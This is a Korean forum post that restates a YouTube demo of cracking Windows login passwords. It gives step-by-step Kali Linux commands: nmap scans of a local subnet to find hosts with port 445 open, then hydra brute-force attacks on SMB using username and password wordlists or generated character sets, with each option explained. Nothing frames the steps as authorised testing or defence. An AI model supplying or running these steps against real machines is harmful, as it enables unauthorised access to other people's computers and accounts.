윈도우 로그인 비밀번호 해킹 시연동영상을 유튜브에서 보고 여기 올려봅니다.
사용한 운영제체는 KALI 입니다
(1) 자신의 IP 확인
# ifconfig
(2) 공격 대상 IP 를 찾음
# nmap -sS 192.168.0.0/24
또는
# nmap -sV 192.168.0.0/24 (열려 있는 포트의 서비스와 버전정보를 보여줌)
445 포트가 열린 PC 를 찾아야 됨
(3) 아이디와 비밀번호 사전파일을 만들거나 인터넷에서 다운을 받음
(4) 무차별 대입으로 비밀번호을 알아냄
보통 두가지 방법이 있음
☞ 방법1 : 아이디 비번 사전 파일을 만들어서 무차별 대입하기
# hydra -L [아이디 사전파일] -P [패스워드 사전파일] [공격대상I IP] smb -V -f
# hydra -L user.txt -P pass.txt 192.168.0.125 smb -V -f
옵션 -f 는 아이디와 비밀번호는 최초 1회 찾으면 작업을 중단함
☞ 방법2 : 아이디를 미리 알고 있을 경우 옵션을 이용해서 비밀번호만 무차별 대입하기
# hydra -l 아이디 -x 숫자1:숫자2:a(A1!) 공격IP smb -V -f
옵션을 설명하면
슷자1은 최소자리수. 숫자2는 최대 자리수. a는 소문자 대표로 a~z 전체를 의미함. A 는 대문자 대표로 대문자 전체, 1은 0~9 를 의미함
특수문자는 각각 입력해야 됨
예시 1:5:a1 → 한자리 부터 5자리 까지 소문자와 숫자를 조합해서 무차별 대입
6:6:1$ → 6자리로만 숫자와 특수문자* 을 조합해서 무차별 대입
4:5:A1 → 4자리부터 해서 5자리까지 대문자와 숫자를 조합해서 무차별 대입함
# hydra -l user -x 4:4:a 192.168.0.125 smb -V -f
추가 옵션 설명 : 대문자 L 과 P 는 사전파일이 필요한 옵션이고 소문자 l 은 실제 아이디 이고 -x 는 비밀번호를 조합해서 사용함
게시글 목록
| 번호 | 제목 |
|---|---|
| 1555 | |
| 1552 | |
| 1551 | |
| 1550 | |
| 1537 | |
| 1535 | |
| 1533 | |
| 1530 | |
| 1529 | |
| 1526 | |
| 1519 | |
| 1518 | |
| 1517 | |
| 1511 | |
| 1508 | |
| 1505 | |
| 1504 | |
| 1499 | |
| 1497 | |
| 1496 | |
| 1491 | |
| 1490 | |
| 1487 | |
| 1486 | |
| 1485 | |
| 1484 | |
| 1477 | |
| 1471 | |
| 1467 | |
| 1464 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기